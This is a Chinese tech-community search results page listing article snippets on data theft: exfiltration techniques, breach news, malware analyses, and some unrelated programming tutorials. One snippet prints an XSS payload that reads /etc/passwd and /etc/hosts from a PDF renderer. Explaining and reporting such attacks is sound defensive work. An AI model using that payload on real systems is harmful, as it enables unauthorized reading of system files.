- 综合排序
- 最热优先
- 最新优先
- 来自专栏网络安全
攻防实战:数据窃取技术详解
网络犯罪分子攻击公司的目的各异,但多数情况下最终目标是数据泄露,即将窃取的敏感数据在暗网出售或公开。 通常涉及持续的数据发送和接收。三、基于常见网络协议的数据窃取技术#####A.TCP套接字窃取(TCPSocketExfiltration)原理与适用场景:直接利用TCP套接字建立连接并传输数据。 **受害者机器准备并发送数据**:假设数据在`task5/creds.txt`。 task5/`目录内容到标准输出。 DNS数据窃取(DNSDataExfiltration)DNS数据窃取是一种将敏感数据编码后,通过一系列DNS查询发送到攻击者控制的DNS服务器的网络攻击。
56541编辑于 2025-12-31 - 来自专栏Khan安全团队
XSS 从 PDF 中窃取数据
<script>x=newXMLHttpRequest;x.onload=function(){document.write(this.responseText)};http://x.open(‘GET’,’file:///etc/hosts’);x.send();</script><script>x=new XMLHttpRequest;x.onload=function(){document.write(this.responseText)};http://x.open(‘GET’,’file:///etc/passwd’);x.send();</script>
33910编辑于 2025-04-28 - 来自专栏大数据文摘
窃取450G的AMD内部数据,这些黑客可能只用了5分钟?!
这个犯罪团伙声称,他们只是多试了几次员工密码,就轻松地登进了AMD系统,轻松窃取了450GB的数据,其中包括“网络文件、系统信息以及AMD密码”。 他们表示,早在1月的时候,就已经入侵并窃取了AMD的数据,为了证明所言属实,该组织发布了一个数据样本作为证据。 Restore Privacy检查了被披露的数据样本,这些数据包括一份泄露的CSV文件,其中包含7万多台设备,似乎属于AMD内部网络,以及一份AMD公司用户凭据清单,其中包括弱密码如password,P 如果情况属实,那么大概只需要5分钟密码破译,任何网络犯罪分子都有可能黑进AMD的内部系统。 本月早些时候,RansomHouse因泄露了来自非洲最大零售连锁店ShopRite的数据而声名狼藉。
32530编辑于 2022-07-01 - 来自专栏FreeBuf
防范数据窃取从了解其手法做起
数据窃取是针对组织攻击链中的最后一个阶段。攻击者窃取数据的技术可谓花样百出,网上也有大量关于数据窃取方面的技术文档以及工具。 工欲善其事必先利其器,防范数据窃取必须先熟悉其使用的手段。文中所提及的大多数技术涉及直接的内部到外部数据窃取。需要说明的是这并不是一个完整版本,如果你知道的更多,那么请在评论处留言并告知我们! Anon paste站点例如pastebin甚至是github,都为我们提供了一个数据窃取的简易通道。许多技术组织通常都会允许Github的使用。 X509证书可以被嵌入到二进制数据中,因此可用于传输数据。 www.wired.com/2017/02/malware-sends-stolen-data-drone-just-pcs-blinking-led/ 磁:ODINI和MAGNETO攻击可以利用计算机处理器产生的磁信号来窃取数据
73530发布于 2018-08-21 - 来自专栏安恒网络空间安全讲武堂
用css绕过同源策略跨域窃取数据
font-family属性的值,即单引号内的,所 以这也将成为一个前置条件,那就是要窃取的数据中不能同时出现单双引号。 最后我们就 可以通过这样的方式完成跨域窃取敏感信息,数据甚至可能包含csrf所需的token,或者更敏感的个人信息。 攻击的一些前提约束 要窃取的数据必须在payload1和payload2之间。 要窃取的数据不能同时存在单引号和双引号,否则会破坏解析的结构。 (数据最后要被解析为css一个属性的值) 要窃取的数据不能包含换行符(css值不支持多行) 这些条件在现代的编码风格下是很难遇到,尤其是不允许出现换行。 我们需要一个可以写任意字符串的属性,这样才能导入我们要窃取的数据。”font-family”是最佳的选择。
1.5K90发布于 2018-02-06 - 来自专栏网络安全
DeepSeek 恶意 Python 包,正在窃取你的数据
研究人员发现,Python 软件包索引(PyPi)中植入了恶意的、模仿 DeepSeek 的软件包,这些代码实际上携带着信息窃取程序。 研究人员指出,“deepseeek” 和 “deepseekai” 在执行时会释放信息窃取程序,以窃取敏感数据,包括 API 密钥、数据库凭证和权限。
51910编辑于 2025-02-06 - 来自专栏Python绿色通道
Scrapy实战5:Xpath实战训练
XPath基于XML的树状结构,提供在数据结构树中找寻节点的能力。起初XPath的提出的初衷是将其作 为一个通用的、介于XPointer与XSL间的语法模型。 win32stdio.py", line , in <module> import win32api ModuleNotFoundError: No module named 'win32api' (5) (5)在jobbole.py中的的parse函数中加一个断点,然后Debug模式运行测试文件main.py 断点设置: ? 断点设置debug结果分析: ? (5)我们继续获取其他数据(复习巩固一下Xpath的用法) 为了快速、有效率的调式数据,给大家推荐一种方法: # cmd 虚拟环境中输入: scrapy shell 你要调试的网址 scrapy shell 建议: (1)决心想学好的,把本文二中的Xpath语法好好记一下,练习一下; (2)爬取网页抓取数据尽量用谷歌浏览器。
1K20发布于 2020-02-12 - 来自专栏大数据文摘
“窃取用户数据”?看阿里如何应对
支付宝与付费通终止合作后,网上突然出现很多支付宝“窃取用户数据”的言论。商务合作终止固然遗憾,但“盗窃”的罪名更重大,尤其是涉及到大家非常关注的数据问题。 毫无疑问我们非常看重数据,数据将会成为改善全社会商业环境的重要资源,我们坚信数据的力量和价值。阿里巴巴从五年前就确定“开放的数据平台”作为自己的战略目标,并且重兵布局云计算和大数据。 基于这样的理解,我们认为数据的商业价值在于运用而不在控制,我们认为数据只有在交换、分享中才能发挥更大的价值,数据会越用价值越高。因此,我们并不担心获取数据的途径,更绝不会用不光彩的手段去获取数据! 如何有效地发挥这些数据的价值,建立一种数据交换以及数据标准的能力,我们的思考才刚刚开始。 5、有一种说法是,因为担心数据被他人获取,大商户或机构都会倾向于使用自己的支付工具,保证对自己数据的独占。我们怎么看待这个问题?
69950发布于 2018-05-21 - 来自专栏火绒安全
AgentTesla病毒解析:利用钓鱼邮件窃取终端隐私数据
当用户被诱导点击运行病毒后,病毒即会窃取用户终端上的隐私数据并上传C&C服务器。 ͼƬ2.png AgentTesla病毒样本通常使用混淆器,通过数据加密、代码加密、控制流混淆等多种混淆方式藏匿自身病毒特征,对抗安全软件查杀。 AgentTesla病毒的主要危害是窃取用户终端中的隐私数据,隐私数据包括用户浏览器登录凭证、FTP软件登录凭证、电子邮件登录凭证、键盘记录信息、屏幕截图、用户系统配置信息等。
73620编辑于 2022-05-20 - 来自专栏程序人生 阅读快乐
HTML5实战
作为Web开发领域里发展最快的技术之一,HTML5凭借其动态特性及跨平台特性日益成为程序设计领域备受推崇的语言。 作为一门新兴语言,HTML5的应用范畴远远不止移动浏览器和桌面浏览器这两个方面,本书将带读者了解一个全方位的HTML5。 《HTML5实战》是一本全面介绍运用HTML5开发Web应用的书籍,包括了数据存储、通信以及如何创建视频游戏等诸多内容。 全书分为四个部分, 部分介绍HTML5语法及本书所涉及的全部API;第二部分介绍基于浏览器的应用;第三部分介绍交互式图像、媒体及游戏;第四部分是附录内容,深入介绍一些本书的主题,提供了一系列重要的参考资科 《HTML5实战》内容结构清晰,示例完整,适合于对JavaScript和HTML语法有一定基础的Web开发人员阅读。通过阅读本书,你将能够创建更加真实、全功能的Web应用。
69120发布于 2018-10-10 154个数据库被黑客窃取?ASML回应
该黑客声称,此次窃取的信息涵盖多类敏感数据,包括磁盘加密密钥、用户数据(用户名/密码)、软件信息以及特定设备的详细信息。 如果消息属实,这将远远超出一般的客户数据泄露事件,将会对ASML公司带来严重的负面影响。这意味着攻击者攻破了ASML的安全系统,并可以访问ASML公司高度敏感的数据。 不过,ASML在最新发布的声明中否认了公司遭黑客窃取数据的说法。 “ASML注意到2026年1月6日在BreachForums上发布的一篇帖子,该帖子声称公司信息被泄露。 所提及的文档中没有来自ASML的数据。”ASML在声明中写道。 第三方的安全研究团队经过分析后也认为,黑客“1011”兜售的所谓ASML的数据实际上毫无用处。 此外,研究人员还发现,黑客“1011”与本周早些时候宣布NordVPN数据泄露的攻击者是同一人。NordVPN公司随后也否认丢失任何数据,该公司代表称这些说法“不实”。
8810编辑于 2026-03-19浏览器“隐私”扩展被曝窃取AI对话数据
浏览器“隐私”扩展被曝窃取AI对话数据据Koi Security的研究报告,四款声称保护隐私的流行浏览器扩展程序实则背道而驰。 这些恶意插件一直在窃取超过800万用户的聊天机器人对话文本,并将其发送回开发者。 达迪克曼解释道,数据收集功能通过硬编码的配置标志默认启用。“没有面向用户的开关可以禁用此功能。停止数据收集的唯一方法是彻底卸载该扩展。” 他说,“要么是审核没有检查从某中心自家AI产品(Gemini)窃取对话的代码,要么是检查了但不认为这是个问题。” 该政策允许在有限场景(例如安全或业务所有权变更)下将数据传输给第三方,但这些场景不包括将数据传输给数据代理。
32210编辑于 2026-01-01- 来自专栏python前行者
《python数据分析与挖掘实战》笔记第5章
常用的回归模型见表5-2 表5-2主要回归模型分类 回归模型名称 适用条件 算法描述 线性回归 因变量与自变量是线性 关系 对一个或多个自变量和因变量之间的线性关系进行建模,可用最 小二乘法求解模型系数 聚类的输入是一组未被标记的样本,聚类根据数据自身的距 离或相似度将其划分为若干组,划分的原则是组内距离最小化而组间(外部)距离最大化,如图5-11 ? 4) 与前一次计算得到的K个聚类中心比较,如果聚类中心发生变化,转过程2),否则 转过程5)。 5) 当质心不发生变化时停止并输出聚类结果。 代码清单5-4 K-Means聚类算法代码 #-*- coding: utf-8 -*- #使用K-Means算法聚类消费行为特征数据 import pandas as pd #参数初始化 inputfile 代码清单5-5 用TSNE进行数据降维并展示聚类结果 #-*- coding: utf-8 -*- #接k_means.py,用TSNE进行数据降维并展示聚类结果 import pandas as pd
1.3K10发布于 2021-03-03 - 来自专栏安恒信息
NSA通过恶意软件感染5万多台计算机,窃取各种敏感信息
由爱德华·斯诺登(Edward Snowden)提供的文件显示,美国国家安全局(以下简称“NSA”)通过恶意软件感染了全球超过5万台计算机,以窃取各种敏感信息。 这一介绍显示,NSA在全球超过5万个地点开展了“计算机网络开发”项目。这一项目通过安装恶意软件,以秘密方式渗透计算机系统。 过去多年中,英国情报部门国家通信总局(以下简称“GCHQ”)在Belgacom的网络中安装了这种恶意软件,以监控该运营商用户的电话和数据流量。 到2012年中期,这一数字已经翻番,达到5万台。 对NSA而言,网络情报活动正越来越重要。计算机黑客的雇佣成本较低,并使NSA获得了一些通过其他方式无法获得的信息。
77770发布于 2018-04-10 - 来自专栏FreeBuf
索尼PS5曝两个内核漏洞,可用来窃取根密钥
继Xbox主机曝出外挂后,索尼PS5也在同一日曝出两个内核漏洞,攻击者利用这两个漏洞窃取了PS5的根密钥,这引发了大众对游戏主机的新一轮担忧。 FailOverFlow黑客组织在推特上发布了一条状态,晒出PS5固件的对称根密钥。之前该组织还在推特上公布了其他几个主机的越狱方法。 该组织声称已经从软件中获得了所有PS5的根密钥,并强调是每台主机。 Andy Nguyen表示,他已使用该内核漏洞访问了PS5的“调试设置”,但他不打算公开披露该漏洞。 △ 谷歌安全工程师Andy Nguyen推特截图 据Zecoxao称,TheFlow利用PS5的分享功能分享了一张屏幕截图,图片上就是“调试设置”菜单。
57320发布于 2021-11-23 - 来自专栏日常活动篇
Qt5实战第九篇:Qt5的数据库操作
一、概述Qt5提供了强大的数据库操作功能,通过QSqlDatabase、QSqlQuery、QSqlTableModel等类,开发者可以轻松地在图形用户界面(GUI)应用程序中进行数据库连接和操作。 无论是SQLite这种轻量级数据库,还是MySQL、Oracle等大型数据库,Qt5都能提供很好的支持。 QApplication app(argc, argv); MainWindow window; window.show(); return app.exec();}五、事务处理Qt5支持数据库事务处理 通过以上内容,我们详细介绍了Qt5数据库操作的各个方面,包括连接数据库、执行SQL操作、使用数据模型、事务处理以及安全性与错误处理等。希望这些内容能帮助你更好地理解和使用Qt5进行数据库开发。 后续我们将继续qt5的其他学习,请多多关注。
1.3K10编辑于 2025-01-02 - 来自专栏日常活动篇
H5 App实战十:H5 App的数据绑定与模板引擎
下面正文开始:正文在H5 App开发中,数据绑定与模板引擎是两个非常关键的概念,它们极大地提高了代码的可维护性和开发效率。本文将详细讲解这两个概念,并通过示例展示如何在项目中实际应用。 一、数据绑定数据绑定是指将数据源(如变量、对象、数组等)与UI元素(如文本、图片、列表等)进行关联,使得当数据源发生变化时,UI元素能够自动更新。1. 双向数据绑定与单向数据绑定双向数据绑定:当数据源或UI元素发生变化时,另一方也会自动更新。常用于表单输入。单向数据绑定:仅当数据源发生变化时,UI元素才会更新。常用于展示数据。2. 虽然这种方法在实际项目中并不常见,但它展示了数据绑定与模板引擎结合使用的可能性。总结数据绑定与模板引擎是H5 App开发中不可或缺的工具。它们能够简化代码结构,提高开发效率,并增强代码的可维护性。 通过本文的示例,你可以更好地理解和应用这两个概念,为你的H5 App开发之路打下坚实的基础。
89410编辑于 2024-11-30 - 来自专栏EdisonTalk
MongoDB入门实战教程(5)
然后,手动创建一个数据库BookStoreDB 和 一个集合 Books。 UpdatedDate':ISODate("2012-10-02T07:58:51Z")}]) 2 配置ASP.NET Core项目 创建WebAPI项目 建立一个ASP.NET Core 或 ASP.NET 5的 通过NuGet安装MongoDB.Driver: PM>Install-Package MongoDB.Driver 目前MongoDB.Driver最新版本为2.12.4(2021年6月5日发布)。 UpdatedDate { get; set; } } 需要注意的是:MongoDB存储时间类型数据时,都是先转换为UTC时间,然后存储到数据库中。当我们取出存储的时间时,就会出现时差的问题。 示例github地址:https://github.com/EdisonChou/EDT.Mongo.Sample 4 总结 本文总结了如何在ASP.NET Core/ASP.NET 5应用程序中操作MongoDB
1.5K10发布于 2021-06-17 - 来自专栏coding
RabbitMQ实战5.路由
继上篇 RabbitMQ实战4.发布与订阅 交换机的路由功能 注意!交换机为匿名交换机时,routing_key指的是队列名,这只是一个特例!这个参数的本意是路由键名!
36220发布于 2018-08-22 - 来自专栏世荣的博客
搭建漏洞环境-实战-5
Windows:127.0.0.1/phpMyAdmin/ Mac:localhost/phpMyAdmin/ 在数据库中新建库名为:“security”的数据库,并把源码中的sql-lab.sql文件导入数据库中 image.png image.png image.png 数据库会显示:导入成功,执行了 9 个查询。 (sql-lab.sql) 然后我们再次打开sql文件,打开sql-connecitons文件夹中的db-creds.inc文件,可以修改数据库的账号,密码,库名等信息,,修改完数据库密码后,打开浏览器访问 (这个文件一般情况下不用动,但是如果报错,就把数据库的密码和用户名填上) image.png 好了,萌新们,开始自己的注入练习吧。
40930编辑于 2022-03-18
腾讯云开发者
Copyright © 2013 - 2026 Tencent Cloud. All Rights Reserved. 腾讯云 版权所有
深圳市腾讯计算机系统有限公司 ICP备案/许可证号:粤B2-20090059 
粤公网安备44030502008569号
腾讯云计算(北京)有限责任公司 京ICP证150476号 | 京ICP备11018762号